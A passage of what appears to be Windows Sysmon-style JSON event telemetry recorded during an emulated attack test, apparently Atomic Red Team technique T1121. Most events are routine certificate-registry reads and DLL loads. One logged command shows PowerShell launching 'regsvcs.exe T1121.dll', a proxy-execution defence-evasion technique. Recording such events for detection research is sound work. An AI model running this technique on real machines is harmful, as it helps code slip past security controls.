"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "clrjit.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570870580000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "process", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "subtype": "terminate", - "timestamp": 131883570870740000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "command_line": "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe\" T1121.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1976, - "ppid": 7036, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "subtype": "create", - "timestamp": 131883570870840000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870740000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870740000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570870740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wow64.dll", - "image_path": "C:\\Windows\\System32\\wow64.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870740000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64win.dll", - "image_path": "C:\\Windows\\System32\\wow64win.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "RegSvcs.exe", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870740000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64cpu.dll", - "image_path": "C:\\Windows\\System32\\wow64cpu.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "mscoree.dll", - "image_path": "C:\\Windows\\SysWOW64\\mscoree.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "mscoreei.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\SysWOW64\\combase.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": 